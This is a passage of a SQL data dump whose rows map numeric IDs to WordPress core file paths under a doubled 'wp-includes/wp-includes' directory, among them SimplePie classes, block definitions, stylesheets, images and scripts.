includes/wp-includes/SimplePie/Cache/Memcached.php'),(3131,'wp-includes/wp-includes/SimplePie/Cache/MySQL.php'),(3132,'wp-includes/wp-includes/SimplePie/Cache/Redis.php'),(3133,'wp-includes/wp-includes/SimplePie/Cache.php'),(3134,'wp-includes/wp-includes/SimplePie/Caption.php'),(3135,'wp-includes/wp-includes/SimplePie/Category.php'),(3136,'wp-includes/wp-includes/SimplePie/Content/Type/Sniffer.php'),(3137,'wp-includes/wp-includes/SimplePie/Copyright.php'),(3138,'wp-includes/wp-includes/SimplePie/Core.php'),(3139,'wp-includes/wp-includes/SimplePie/Credit.php'),(3140,'wp-includes/wp-includes/SimplePie/Decode/HTML/Entities.php'),(3141,'wp-includes/wp-includes/SimplePie/Enclosure.php'),(3142,'wp-includes/wp-includes/SimplePie/Exception.php'),(3143,'wp-includes/wp-includes/SimplePie/File.php'),(3144,'wp-includes/wp-includes/SimplePie/HTTP/Parser.php'),(3145,'wp-includes/wp-includes/SimplePie/IRI.php'),(3146,'wp-includes/wp-includes/SimplePie/Item.php'),(3147,'wp-includes/wp-includes/SimplePie/Locator.php'),(3148,'wp-includes/wp-includes/SimplePie/Misc.php'),(3149,'wp-includes/wp-includes/SimplePie/Net/IPv6.php'),(3150,'wp-includes/wp-includes/SimplePie/Parse/Date.php'),(3151,'wp-includes/wp-includes/SimplePie/Parser.php'),(3152,'wp-includes/wp-includes/SimplePie/Rating.php'),(3153,'wp-includes/wp-includes/SimplePie/Registry.php'),(3154,'wp-includes/wp-includes/SimplePie/Restriction.php'),(3155,'wp-includes/wp-includes/SimplePie/Sanitize.php'),(3156,'wp-includes/wp-includes/SimplePie/Source.php'),(3157,'wp-includes/wp-includes/SimplePie/XML/Declaration/Parser.php'),(3158,'wp-includes/wp-includes/SimplePie/gzdecode.php'),(3159,'wp-includes/wp-includes/Text/Diff/Engine/native.php'),(3160,'wp-includes/wp-includes/Text/Diff/Engine/shell.php'),(3161,'wp-includes/wp-includes/Text/Diff/Engine/string.php'),(3162,'wp-includes/wp-includes/Text/Diff/Engine/xdiff.php'),(3163,'wp-includes/wp-includes/Text/Diff/Renderer/inline.php'),(3164,'wp-includes/wp-includes/Text/Diff/Renderer.php'),(3165,'wp-includes/wp-includes/Text/Diff.php'),(3166,'wp-includes/wp-includes/admin-bar.php'),(3167,'wp-includes/wp-includes/assets/script-loader-packages.php'),(3168,'wp-includes/wp-includes/atomlib.php'),(3169,'wp-includes/wp-includes/author-template.php'),(3170,'wp-includes/wp-includes/block-patterns/heading-paragraph.php'),(3171,'wp-includes/wp-includes/block-patterns/large-header-button.php'),(3172,'wp-includes/wp-includes/block-patterns/large-header.php'),(3173,'wp-includes/wp-includes/block-patterns/quote.php'),(3174,'wp-includes/wp-includes/block-patterns/text-three-columns-buttons.php'),(3175,'wp-includes/wp-includes/block-patterns/text-two-columns-with-images.php'),(3176,'wp-includes/wp-includes/block-patterns/text-two-columns.php'),(3177,'wp-includes/wp-includes/block-patterns/three-buttons.php'),(3178,'wp-includes/wp-includes/block-patterns/two-buttons.php'),(3179,'wp-includes/wp-includes/block-patterns/two-images.php'),(3180,'wp-includes/wp-includes/block-patterns.php'),(3181,'wp-includes/wp-includes/block-supports/align.php'),(3182,'wp-includes/wp-includes/block-supports/colors.php'),(3183,'wp-includes/wp-includes/block-supports/custom-classname.php'),(3184,'wp-includes/wp-includes/block-supports/generated-classname.php'),(3185,'wp-includes/wp-includes/block-supports/typography.php'),(3186,'wp-includes/wp-includes/blocks/archives/block.json'),(3187,'wp-includes/wp-includes/blocks/archives.php'),(3188,'wp-includes/wp-includes/blocks/audio/block.json'),(3189,'wp-includes/wp-includes/blocks/block/block.json'),(3190,'wp-includes/wp-includes/blocks/block.php'),(3191,'wp-includes/wp-includes/blocks/button/block.json'),(3192,'wp-includes/wp-includes/blocks/buttons/block.json'),(3193,'wp-includes/wp-includes/blocks/calendar/block.json'),(3194,'wp-includes/wp-includes/blocks/calendar.php'),(3195,'wp-includes/wp-includes/blocks/categories/block.json'),(3196,'wp-includes/wp-includes/blocks/categories.php'),(3197,'wp-includes/wp-includes/blocks/code/block.json'),(3198,'wp-includes/wp-includes/blocks/column/block.json'),(3199,'wp-includes/wp-includes/blocks/columns/block.json'),(3200,'wp-includes/wp-includes/blocks/embed/block.json'),(3201,'wp-includes/wp-includes/blocks/file/block.json'),(3202,'wp-includes/wp-includes/blocks/freeform/block.json'),(3203,'wp-includes/wp-includes/blocks/gallery/block.json'),(3204,'wp-includes/wp-includes/blocks/group/block.json'),(3205,'wp-includes/wp-includes/blocks/heading/block.json'),(3206,'wp-includes/wp-includes/blocks/html/block.json'),(3207,'wp-includes/wp-includes/blocks/image/block.json'),(3208,'wp-includes/wp-includes/blocks/index.php'),(3209,'wp-includes/wp-includes/blocks/latest-comments/block.json'),(3210,'wp-includes/wp-includes/blocks/latest-comments.php'),(3211,'wp-includes/wp-includes/blocks/latest-posts/block.json'),(3212,'wp-includes/wp-includes/blocks/latest-posts.php'),(3213,'wp-includes/wp-includes/blocks/list/block.json'),(3214,'wp-includes/wp-includes/blocks/media-text/block.json'),(3215,'wp-includes/wp-includes/blocks/missing/block.json'),(3216,'wp-includes/wp-includes/blocks/more/block.json'),(3217,'wp-includes/wp-includes/blocks/nextpage/block.json'),(3218,'wp-includes/wp-includes/blocks/paragraph/block.json'),(3219,'wp-includes/wp-includes/blocks/preformatted/block.json'),(3220,'wp-includes/wp-includes/blocks/pullquote/block.json'),(3221,'wp-includes/wp-includes/blocks/quote/block.json'),(3222,'wp-includes/wp-includes/blocks/rss/block.json'),(3223,'wp-includes/wp-includes/blocks/rss.php'),(3224,'wp-includes/wp-includes/blocks/search/block.json'),(3225,'wp-includes/wp-includes/blocks/search.php'),(3226,'wp-includes/wp-includes/blocks/separator/block.json'),(3227,'wp-includes/wp-includes/blocks/shortcode/block.json'),(3228,'wp-includes/wp-includes/blocks/shortcode.php'),(3229,'wp-includes/wp-includes/blocks/social-link/block.json'),(3230,'wp-includes/wp-includes/blocks/social-link.php'),(3231,'wp-includes/wp-includes/blocks/social-links/block.json'),(3232,'wp-includes/wp-includes/blocks/spacer/block.json'),(3233,'wp-includes/wp-includes/blocks/subhead/block.json'),(3234,'wp-includes/wp-includes/blocks/table/block.json'),(3235,'wp-includes/wp-includes/blocks/tag-cloud/block.json'),(3236,'wp-includes/wp-includes/blocks/tag-cloud.php'),(3237,'wp-includes/wp-includes/blocks/text-columns/block.json'),(3238,'wp-includes/wp-includes/blocks/verse/block.json'),(3239,'wp-includes/wp-includes/blocks/video/block.json'),(3240,'wp-includes/wp-includes/blocks.php'),(3241,'wp-includes/wp-includes/bookmark-template.php'),(3242,'wp-includes/wp-includes/bookmark.php'),(3243,'wp-includes/wp-includes/cache-compat.php'),(3244,'wp-includes/wp-includes/cache.php'),(3245,'wp-includes/wp-includes/canonical.php'),(3246,'wp-includes/wp-includes/capabilities.php'),(3247,'wp-includes/wp-includes/category-template.php'),(3248,'wp-includes/wp-includes/category.php'),(3249,'wp-includes/wp-includes/certificates/ca-bundle.crt'),(3250,'wp-includes/wp-includes/class-IXR.php'),(3251,'wp-includes/wp-includes/class-feed.php'),(3252,'wp-includes/wp-includes/class-http.php'),(3253,'wp-includes/wp-includes/class-json.php'),(3254,'wp-includes/wp-includes/class-oembed.php'),(3255,'wp-includes/wp-includes/class-phpass.php'),(3256,'wp-includes/wp-includes/class-phpmailer.php'),(3257,'wp-includes/wp-includes/class-pop3.php'),(3258,'wp-includes/wp-includes/class-requests.php'),(3259,'wp-includes/wp-includes/class-simplepie.php'),(3260,'wp-includes/wp-includes/class-smtp.php'),(3261,'wp-includes/wp-includes/class-snoopy.php'),(3262,'wp-includes/wp-includes/class-walker-category-dropdown.php'),(3263,'wp-includes/wp-includes/class-walker-category.php'),(3264,'wp-includes/wp-includes/class-walker-comment.php'),(3265,'wp-includes/wp-includes/class-walker-nav-menu.php'),(3266,'wp-includes/wp-includes/class-walker-page-dropdown.php'),(3267,'wp-includes/wp-includes/class-walker-page.php'),(3268,'wp-includes/wp-includes/class-wp-admin-bar.php'),(3269,'wp-includes/wp-includes/class-wp-ajax-response.php'),(3270,'wp-includes/wp-includes/class-wp-application-passwords.php'),(3271,'wp-includes/wp-includes/class-wp-block-list.php'),(3272,'wp-includes/wp-includes/class-wp-block-parser.php'),(3273,'wp-includes/wp-includes/class-wp-block-pattern-categories-registry.php'),(3274,'wp-includes/wp-includes/class-wp-block-patterns-registry.php'),(3275,'wp-includes/wp-includes/class-wp-block-styles-registry.php'),(3276,'wp-includes/wp-includes/class-wp-block-supports.php'),(3277,'wp-includes/wp-includes/class-wp-block-type-registry.php'),(3278,'wp-includes/wp-includes/class-wp-block-type.php'),(3279,'wp-includes/wp-includes/class-wp-block.php'),(3280,'wp-includes/wp-includes/class-wp-comment-query.php'),(3281,'wp-includes/wp-includes/class-wp-comment.php'),(3282,'wp-includes/wp-includes/class-wp-customize-control.php'),(3283,'wp-includes/wp-includes/class-wp-customize-manager.php'),(3284,'wp-includes/wp-includes/class-wp-customize-nav-menus.php'),(3285,'wp-includes/wp-includes/class-wp-customize-panel.php'),(3286,'wp-includes/wp-includes/class-wp-customize-section.php'),(3287,'wp-includes/wp-includes/class-wp-customize-setting.php'),(3288,'wp-includes/wp-includes/class-wp-customize-widgets.php'),(3289,'wp-includes/wp-includes/class-wp-date-query.php'),(3290,'wp-includes/wp-includes/class-wp-dependency.php'),(3291,'wp-includes/wp-includes/class-wp-editor.php'),(3292,'wp-includes/wp-includes/class-wp-embed.php'),(3293,'wp-includes/wp-includes/class-wp-error.php'),(3294,'wp-includes/wp-includes/class-wp-fatal-error-handler.php'),(3295,'wp-includes/wp-includes/class-wp-feed-cache-transient.php'),(3296,'wp-includes/wp-includes/class-wp-feed-cache.php'),(3297,'wp-includes/wp-includes/class-wp-hook.php'),(3298,'wp-includes/wp-includes/class-wp-http-cookie.php'),(3299,'wp-includes/wp-includes/class-wp-http-curl.php'),(3300,'wp-includes/wp-includes/class-wp-http-encoding.php'),(3301,'wp-includes/wp-includes/class-wp-http-ixr-client.php'),(3302,'wp-includes/wp-includes/class-wp-http-proxy.php'),(3303,'wp-includes/wp-includes/class-wp-http-requests-hooks.php'),(3304,'wp-includes/wp-includes/class-wp-http-requests-response.php'),(3305,'wp-includes/wp-includes/class-wp-http-response.php'),(3306,'wp-includes/wp-includes/class-wp-http-streams.php'),(3307,'wp-includes/wp-includes/class-wp-image-editor-gd.php'),(3308,'wp-includes/wp-includes/class-wp-image-editor-imagick.php'),(3309,'wp-includes/wp-includes/class-wp-image-editor.php'),(3310,'wp-includes/wp-includes/class-wp-list-util.php'),(3311,'wp-includes/wp-includes/class-wp-locale-switcher.php'),(3312,'wp-includes/wp-includes/class-wp-locale.php'),(3313,'wp-includes/wp-includes/class-wp-matchesmapregex.php'),(3314,'wp-includes/wp-includes/class-wp-meta-query.php'),(3315,'wp-includes/wp-includes/class-wp-metadata-lazyloader.php'),(3316,'wp-includes/wp-includes/class-wp-network-query.php'),(3317,'wp-includes/wp-includes/class-wp-network.php'),(3318,'wp-includes/wp-includes/class-wp-object-cache.php'),(3319,'wp-includes/wp-includes/class-wp-oembed-controller.php'),(3320,'wp-includes/wp-includes/class-wp-oembed.php'),(3321,'wp-includes/wp-includes/class-wp-paused-extensions-storage.php'),(3322,'wp-includes/wp-includes/class-wp-post-type.php'),(3323,'wp-includes/wp-includes/class-wp-post.php'),(3324,'wp-includes/wp-includes/class-wp-query.php'),(3325,'wp-includes/wp-includes/class-wp-recovery-mode-cookie-service.php'),(3326,'wp-includes/wp-includes/class-wp-recovery-mode-email-service.php'),(3327,'wp-includes/wp-includes/class-wp-recovery-mode-key-service.php'),(3328,'wp-includes/wp-includes/class-wp-recovery-mode-link-service.php'),(3329,'wp-includes/wp-includes/class-wp-recovery-mode.php'),(3330,'wp-includes/wp-includes/class-wp-rewrite.php'),(3331,'wp-includes/wp-includes/class-wp-role.php'),(3332,'wp-includes/wp-includes/class-wp-roles.php'),(3333,'wp-includes/wp-includes/class-wp-session-tokens.php'),(3334,'wp-includes/wp-includes/class-wp-simplepie-file.php'),(3335,'wp-includes/wp-includes/class-wp-simplepie-sanitize-kses.php'),(3336,'wp-includes/wp-includes/class-wp-site-query.php'),(3337,'wp-includes/wp-includes/class-wp-site.php'),(3338,'wp-includes/wp-includes/class-wp-tax-query.php'),(3339,'wp-includes/wp-includes/class-wp-taxonomy.php'),(3340,'wp-includes/wp-includes/class-wp-term-query.php'),(3341,'wp-includes/wp-includes/class-wp-term.php'),(3342,'wp-includes/wp-includes/class-wp-text-diff-renderer-inline.php'),(3343,'wp-includes/wp-includes/class-wp-text-diff-renderer-table.php'),(3344,'wp-includes/wp-includes/class-wp-theme.php'),(3345,'wp-includes/wp-includes/class-wp-user-meta-session-tokens.php'),(3346,'wp-includes/wp-includes/class-wp-user-query.php'),(3347,'wp-includes/wp-includes/class-wp-user-request.php'),(3348,'wp-includes/wp-includes/class-wp-user.php'),(3349,'wp-includes/wp-includes/class-wp-walker.php'),(3350,'wp-includes/wp-includes/class-wp-widget-factory.php'),(3351,'wp-includes/wp-includes/class-wp-widget.php'),(3352,'wp-includes/wp-includes/class-wp-xmlrpc-server.php'),(3353,'wp-includes/wp-includes/class-wp.php'),(3354,'wp-includes/wp-includes/class.wp-dependencies.php'),(3355,'wp-includes/wp-includes/class.wp-scripts.php'),(3356,'wp-includes/wp-includes/class.wp-styles.php'),(3357,'wp-includes/wp-includes/comment-template.php'),(3358,'wp-includes/wp-includes/comment.php'),(3359,'wp-includes/wp-includes/compat.php'),(3360,'wp-includes/wp-includes/cron.php'),(3361,'wp-includes/wp-includes/css/admin-bar-rtl.css'),(3362,'wp-includes/wp-includes/css/admin-bar-rtl.min.css'),(3363,'wp-includes/wp-includes/css/admin-bar.css'),(3364,'wp-includes/wp-includes/css/admin-bar.min.css'),(3365,'wp-includes/wp-includes/css/buttons-rtl.css'),(3366,'wp-includes/wp-includes/css/buttons-rtl.min.css'),(3367,'wp-includes/wp-includes/css/buttons.css'),(3368,'wp-includes/wp-includes/css/buttons.min.css'),(3369,'wp-includes/wp-includes/css/customize-preview-rtl.css'),(3370,'wp-includes/wp-includes/css/customize-preview-rtl.min.css'),(3371,'wp-includes/wp-includes/css/customize-preview.css'),(3372,'wp-includes/wp-includes/css/customize-preview.min.css'),(3373,'wp-includes/wp-includes/css/dashicons.css'),(3374,'wp-includes/wp-includes/css/dashicons.min.css'),(3375,'wp-includes/wp-includes/css/dist/block-directory/style-rtl.css'),(3376,'wp-includes/wp-includes/css/dist/block-directory/style-rtl.min.css'),(3377,'wp-includes/wp-includes/css/dist/block-directory/style.css'),(3378,'wp-includes/wp-includes/css/dist/block-directory/style.min.css'),(3379,'wp-includes/wp-includes/css/dist/block-editor/style-rtl.css'),(3380,'wp-includes/wp-includes/css/dist/block-editor/style-rtl.min.css'),(3381,'wp-includes/wp-includes/css/dist/block-editor/style.css'),(3382,'wp-includes/wp-includes/css/dist/block-editor/style.min.css'),(3383,'wp-includes/wp-includes/css/dist/block-library/common-rtl.css'),(3384,'wp-includes/wp-includes/css/dist/block-library/common-rtl.min.css'),(3385,'wp-includes/wp-includes/css/dist/block-library/common.css'),(3386,'wp-includes/wp-includes/css/dist/block-library/common.min.css'),(3387,'wp-includes/wp-includes/css/dist/block-library/editor-rtl.css'),(3388,'wp-includes/wp-includes/css/dist/block-library/editor-rtl.min.css'),(3389,'wp-includes/wp-includes/css/dist/block-library/editor.css'),(3390,'wp-includes/wp-includes/css/dist/block-library/editor.min.css'),(3391,'wp-includes/wp-includes/css/dist/block-library/style-rtl.css'),(3392,'wp-includes/wp-includes/css/dist/block-library/style-rtl.min.css'),(3393,'wp-includes/wp-includes/css/dist/block-library/style.css'),(3394,'wp-includes/wp-includes/css/dist/block-library/style.min.css'),(3395,'wp-includes/wp-includes/css/dist/block-library/theme-rtl.css'),(3396,'wp-includes/wp-includes/css/dist/block-library/theme-rtl.min.css'),(3397,'wp-includes/wp-includes/css/dist/block-library/theme.css'),(3398,'wp-includes/wp-includes/css/dist/block-library/theme.min.css'),(3399,'wp-includes/wp-includes/css/dist/components/style-rtl.css'),(3400,'wp-includes/wp-includes/css/dist/components/style-rtl.min.css'),(3401,'wp-includes/wp-includes/css/dist/components/style.css'),(3402,'wp-includes/wp-includes/css/dist/components/style.min.css'),(3403,'wp-includes/wp-includes/css/dist/edit-post/style-rtl.css'),(3404,'wp-includes/wp-includes/css/dist/edit-post/style-rtl.min.css'),(3405,'wp-includes/wp-includes/css/dist/edit-post/style.css'),(3406,'wp-includes/wp-includes/css/dist/edit-post/style.min.css'),(3407,'wp-includes/wp-includes/css/dist/editor/editor-styles-rtl.css'),(3408,'wp-includes/wp-includes/css/dist/editor/editor-styles-rtl.min.css'),(3409,'wp-includes/wp-includes/css/dist/editor/editor-styles.css'),(3410,'wp-includes/wp-includes/css/dist/editor/editor-styles.min.css'),(3411,'wp-includes/wp-includes/css/dist/editor/style-rtl.css'),(3412,'wp-includes/wp-includes/css/dist/editor/style-rtl.min.css'),(3413,'wp-includes/wp-includes/css/dist/editor/style.css'),(3414,'wp-includes/wp-includes/css/dist/editor/style.min.css'),(3415,'wp-includes/wp-includes/css/dist/format-library/style-rtl.css'),(3416,'wp-includes/wp-includes/css/dist/format-library/style-rtl.min.css'),(3417,'wp-includes/wp-includes/css/dist/format-library/style.css'),(3418,'wp-includes/wp-includes/css/dist/format-library/style.min.css'),(3419,'wp-includes/wp-includes/css/dist/list-reusable-blocks/style-rtl.css'),(3420,'wp-includes/wp-includes/css/dist/list-reusable-blocks/style-rtl.min.css'),(3421,'wp-includes/wp-includes/css/dist/list-reusable-blocks/style.css'),(3422,'wp-includes/wp-includes/css/dist/list-reusable-blocks/style.min.css'),(3423,'wp-includes/wp-includes/css/dist/nux/style-rtl.css'),(3424,'wp-includes/wp-includes/css/dist/nux/style-rtl.min.css'),(3425,'wp-includes/wp-includes/css/dist/nux/style.css'),(3426,'wp-includes/wp-includes/css/dist/nux/style.min.css'),(3427,'wp-includes/wp-includes/css/editor-rtl.css'),(3428,'wp-includes/wp-includes/css/editor-rtl.min.css'),(3429,'wp-includes/wp-includes/css/editor.css'),(3430,'wp-includes/wp-includes/css/editor.min.css'),(3431,'wp-includes/wp-includes/css/jquery-ui-dialog-rtl.css'),(3432,'wp-includes/wp-includes/css/jquery-ui-dialog-rtl.min.css'),(3433,'wp-includes/wp-includes/css/jquery-ui-dialog.css'),(3434,'wp-includes/wp-includes/css/jquery-ui-dialog.min.css'),(3435,'wp-includes/wp-includes/css/media-views-rtl.css'),(3436,'wp-includes/wp-includes/css/media-views-rtl.min.css'),(3437,'wp-includes/wp-includes/css/media-views.css'),(3438,'wp-includes/wp-includes/css/media-views.min.css'),(3439,'wp-includes/wp-includes/css/wp-auth-check-rtl.css'),(3440,'wp-includes/wp-includes/css/wp-auth-check-rtl.min.css'),(3441,'wp-includes/wp-includes/css/wp-auth-check.css'),(3442,'wp-includes/wp-includes/css/wp-auth-check.min.css'),(3443,'wp-includes/wp-includes/css/wp-embed-template-ie.css'),(3444,'wp-includes/wp-includes/css/wp-embed-template-ie.min.css'),(3445,'wp-includes/wp-includes/css/wp-embed-template.css'),(3446,'wp-includes/wp-includes/css/wp-embed-template.min.css'),(3447,'wp-includes/wp-includes/css/wp-pointer-rtl.css'),(3448,'wp-includes/wp-includes/css/wp-pointer-rtl.min.css'),(3449,'wp-includes/wp-includes/css/wp-pointer.css'),(3450,'wp-includes/wp-includes/css/wp-pointer.min.css'),(3451,'wp-includes/wp-includes/customize/class-wp-customize-background-image-control.php'),(3452,'wp-includes/wp-includes/customize/class-wp-customize-background-image-setting.php'),(3453,'wp-includes/wp-includes/customize/class-wp-customize-background-position-control.php'),(3454,'wp-includes/wp-includes/customize/class-wp-customize-code-editor-control.php'),(3455,'wp-includes/wp-includes/customize/class-wp-customize-color-control.php'),(3456,'wp-includes/wp-includes/customize/class-wp-customize-cropped-image-control.php'),(3457,'wp-includes/wp-includes/customize/class-wp-customize-custom-css-setting.php'),(3458,'wp-includes/wp-includes/customize/class-wp-customize-date-time-control.php'),(3459,'wp-includes/wp-includes/customize/class-wp-customize-filter-setting.php'),(3460,'wp-includes/wp-includes/customize/class-wp-customize-header-image-control.php'),(3461,'wp-includes/wp-includes/customize/class-wp-customize-header-image-setting.php'),(3462,'wp-includes/wp-includes/customize/class-wp-customize-image-control.php'),(3463,'wp-includes/wp-includes/customize/class-wp-customize-media-control.php'),(3464,'wp-includes/wp-includes/customize/class-wp-customize-nav-menu-auto-add-control.php'),(3465,'wp-includes/wp-includes/customize/class-wp-customize-nav-menu-control.php'),(3466,'wp-includes/wp-includes/customize/class-wp-customize-nav-menu-item-control.php'),(3467,'wp-includes/wp-includes/customize/class-wp-customize-nav-menu-item-setting.php'),(3468,'wp-includes/wp-includes/customize/class-wp-customize-nav-menu-location-control.php'),(3469,'wp-includes/wp-includes/customize/class-wp-customize-nav-menu-locations-control.php'),(3470,'wp-includes/wp-includes/customize/class-wp-customize-nav-menu-name-control.php'),(3471,'wp-includes/wp-includes/customize/class-wp-customize-nav-menu-section.php'),(3472,'wp-includes/wp-includes/customize/class-wp-customize-nav-menu-setting.php'),(3473,'wp-includes/wp-includes/customize/class-wp-customize-nav-menus-panel.php'),(3474,'wp-includes/wp-includes/customize/class-wp-customize-new-menu-control.php'),(3475,'wp-includes/wp-includes/customize/class-wp-customize-new-menu-section.php'),(3476,'wp-includes/wp-includes/customize/class-wp-customize-partial.php'),(3477,'wp-includes/wp-includes/customize/class-wp-customize-selective-refresh.php'),(3478,'wp-includes/wp-includes/customize/class-wp-customize-sidebar-section.php'),(3479,'wp-includes/wp-includes/customize/class-wp-customize-site-icon-control.php'),(3480,'wp-includes/wp-includes/customize/class-wp-customize-theme-control.php'),(3481,'wp-includes/wp-includes/customize/class-wp-customize-themes-panel.php'),(3482,'wp-includes/wp-includes/customize/class-wp-customize-themes-section.php'),(3483,'wp-includes/wp-includes/customize/class-wp-customize-upload-control.php'),(3484,'wp-includes/wp-includes/customize/class-wp-widget-area-customize-control.php'),(3485,'wp-includes/wp-includes/customize/class-wp-widget-form-customize-control.php'),(3486,'wp-includes/wp-includes/date.php'),(3487,'wp-includes/wp-includes/default-constants.php'),(3488,'wp-includes/wp-includes/default-filters.php'),(3489,'wp-includes/wp-includes/default-widgets.php'),(3490,'wp-includes/wp-includes/deprecated.php'),(3491,'wp-includes/wp-includes/embed-template.php'),(3492,'wp-includes/wp-includes/embed.php'),(3493,'wp-includes/wp-includes/error-protection.php'),(3494,'wp-includes/wp-includes/feed-atom-comments.php'),(3495,'wp-includes/wp-includes/feed-atom.php'),(3496,'wp-includes/wp-includes/feed-rdf.php'),(3497,'wp-includes/wp-includes/feed-rss.php'),(3498,'wp-includes/wp-includes/feed-rss2-comments.php'),(3499,'wp-includes/wp-includes/feed-rss2.php'),(3500,'wp-includes/wp-includes/feed.php'),(3501,'wp-includes/wp-includes/formatting.php'),(3502,'wp-includes/wp-includes/functions.php'),(3503,'wp-includes/wp-includes/functions.wp-scripts.php'),(3504,'wp-includes/wp-includes/functions.wp-styles.php'),(3505,'wp-includes/wp-includes/general-template.php'),(3506,'wp-includes/wp-includes/http.php'),(3507,'wp-includes/wp-includes/https-detection.php'),(3508,'wp-includes/wp-includes/https-migration.php'),(3509,'wp-includes/wp-includes/images/admin-bar-sprite-2x.png'),(3510,'wp-includes/wp-includes/images/admin-bar-sprite.png'),(3511,'wp-includes/wp-includes/images/arrow-pointer-blue-2x.png'),(3512,'wp-includes/wp-includes/images/arrow-pointer-blue.png'),(3513,'wp-includes/wp-includes/images/blank.gif'),(3514,'wp-includes/wp-includes/images/crystal/archive.png'),(3515,'wp-includes/wp-includes/images/crystal/audio.png'),(3516,'wp-includes/wp-includes/images/crystal/code.png'),(3517,'wp-includes/wp-includes/images/crystal/default.png'),(3518,'wp-includes/wp-includes/images/crystal/document.png'),(3519,'wp-includes/wp-includes/images/crystal/interactive.png'),(3520,'wp-includes/wp-includes/images/crystal/license.txt'),(3521,'wp-includes/wp-includes/images/crystal/spreadsheet.png'),(3522,'wp-includes/wp-includes/images/crystal/text.png'),(3523,'wp-includes/wp-includes/images/crystal/video.png'),(3524,'wp-includes/wp-includes/images/down_arrow-2x.gif'),(3525,'wp-includes/wp-includes/images/down_arrow.gif'),(3526,'wp-includes/wp-includes/images/icon-pointer-flag-2x.png'),(3527,'wp-includes/wp-includes/images/icon-pointer-flag.png'),(3528,'wp-includes/wp-includes/images/media/archive.png'),(3529,'wp-includes/wp-includes/images/media/audio.png'),(3530,'wp-includes/wp-includes/images/media/code.png'),(3531,'wp-includes/wp-includes/images/media/default.png'),(3532,'wp-includes/wp-includes/images/media/document.png'),(3533,'wp-includes/wp-includes/images/media/interactive.png'),(3534,'wp-includes/wp-includes/images/media/spreadsheet.png'),(3535,'wp-includes/wp-includes/images/media/text.png'),(3536,'wp-includes/wp-includes/images/media/video.png'),(3537,'wp-includes/wp-includes/images/rss-2x.png'),(3538,'wp-includes/wp-includes/images/rss.png'),(3539,'wp-includes/wp-includes/images/smilies/frownie.png'),(3540,'wp-includes/wp-includes/images/smilies/icon_arrow.gif'),(3541,'wp-includes/wp-includes/images/smilies/icon_biggrin.gif'),(3542,'wp-includes/wp-includes/images/smilies/icon_confused.gif'),(3543,'wp-includes/wp-includes/images/smilies/icon_cool.gif'),(3544,'wp-includes/wp-includes/images/smilies/icon_cry.gif'),(3545,'wp-includes/wp-includes/images/smilies/icon_eek.gif'),(3546,'wp-includes/wp-includes/images/smilies/icon_evil.gif'),(3547,'wp-includes/wp-includes/images/smilies/icon_exclaim.gif'),(3548,'wp-includes/wp-includes/images/smilies/icon_idea.gif'),(3549,'wp-includes/wp-includes/images/smilies/icon_lol.gif'),(3550,'wp-includes/wp-includes/images/smilies/icon_mad.gif'),(3551,'wp-includes/wp-includes/images/smilies/icon_mrgreen.gif'),(3552,'wp-includes/wp-includes/images/smilies/icon_neutral.gif'),(3553,'wp-includes/wp-includes/images/smilies/icon_question.gif'),(3554,'wp-includes/wp-includes/images/smilies/icon_razz.gif'),(3555,'wp-includes/wp-includes/images/smilies/icon_redface.gif'),(3556,'wp-includes/wp-includes/images/smilies/icon_rolleyes.gif'),(3557,'wp-includes/wp-includes/images/smilies/icon_sad.gif'),(3558,'wp-includes/wp-includes/images/smilies/icon_smile.gif'),(3559,'wp-includes/wp-includes/images/smilies/icon_surprised.gif'),(3560,'wp-includes/wp-includes/images/smilies/icon_twisted.gif'),(3561,'wp-includes/wp-includes/images/smilies/icon_wink.gif'),(3562,'wp-includes/wp-includes/images/smilies/mrgreen.png'),(3563,'wp-includes/wp-includes/images/smilies/rolleyes.png'),(3564,'wp-includes/wp-includes/images/smilies/simple-smile.png'),(3565,'wp-includes/wp-includes/images/spinner-2x.gif'),(3566,'wp-includes/wp-includes/images/spinner.gif'),(3567,'wp-includes/wp-includes/images/toggle-arrow-2x.png'),(3568,'wp-includes/wp-includes/images/toggle-arrow.png'),(3569,'wp-includes/wp-includes/images/uploader-icons-2x.png'),(3570,'wp-includes/wp-includes/images/uploader-icons.png'),(3571,'wp-includes/wp-includes/images/w-logo-blue-white-bg.png'),(3572,'wp-includes/wp-includes/images/w-logo-blue.png'),(3573,'wp-includes/wp-includes/images/wlw/wp-comments.png'),(3574,'wp-includes/wp-includes/images/wlw/wp-icon.png'),(3575,'wp-includes/wp-includes/images/wlw/wp-watermark.png'),(3576,'wp-includes/wp-includes/images/wpicons-2x.png'),(3577,'wp-includes/wp-includes/images/wpicons.png'),(3578,'wp-includes/wp-includes/images/wpspin-2x.gif'),(3579,'wp-includes/wp-includes/images/wpspin.gif'),(3580,'wp-includes/wp-includes/images/xit-2x.gif'),(3581,'wp-includes/wp-includes/images/xit.gif'),(3582,'wp-includes/wp-includes/js/admin-bar.js'),(3583,'wp-includes/wp-includes/js/admin-bar.min.js'),(3584,'wp-includes/wp-includes/js/api-request.js'),(3585,'wp-includes/wp-includes/js/api-request.min.js'),(3586,'wp-includes/wp-includes/js/autosave.js'),(3587,'wp-includes/wp-includes/js/autosave.min.js'),(3588,'wp-includes/wp-includes/js/backbone.js'),(3589,'wp-includes/wp-includes/js/backbone.min.js'),(3590,'wp-includes/wp-includes/js/clipboard.js'),(3591,'wp-includes/wp-includes/js/clipboard.min.js'),(3592,'wp-includes/wp-includes/js/codemirror/codemirror.min.css'),(3593,'wp-includes/wp-includes/js/codemirror/codemirror.min.js'),(3594,'wp-includes/wp-includes/js/codemirror/csslint.js'),(3595,'wp-includes/wp-includes/js/codemirror/esprima.js'),(3596,'wp-includes/wp-includes/js/codemirror/fakejshint.js'),(3597,'wp-includes/wp-includes/js/codemirror/htmlhint-kses.js'),(3598,'wp-includes/wp-includes/js/codemirror/htmlhint.js'),(3599,'wp-includes/wp-includes/js/codemirror/jsonlint.js'),(3600,'wp-includes/wp-includes/js/colorpicker.js'),(3601,'wp-includes/wp-includes/js/colorpicker.min.js'),(3602,'wp-includes/wp-includes/js/comment-reply.js'),(3603,'wp-includes/wp-includes/js/comment-reply.min.js'),(3604,'wp-includes/wp-includes/js/crop/cropper.css'),(3605,'wp-includes/wp-includes/js/crop/cropper.js'),(3606,'wp-includes/wp-includes/js/crop/marqueeHoriz.gif'),(3607,'wp-includes/wp-includes/js/crop/marqueeVert.gif'),(3608,'wp-includes/wp-includes/js/customize-base.js'),(3609,'wp-includes/wp-includes/js/customize-base.min.js'),(3610,'wp-includes/wp-includes/js/customize-loader.js'),(3611,'wp-includes/wp-includes/js/customize-loader.min.js'),(3612,'wp-includes/wp-includes/js/customize-models.js'),(3613,'wp-includes/wp-includes/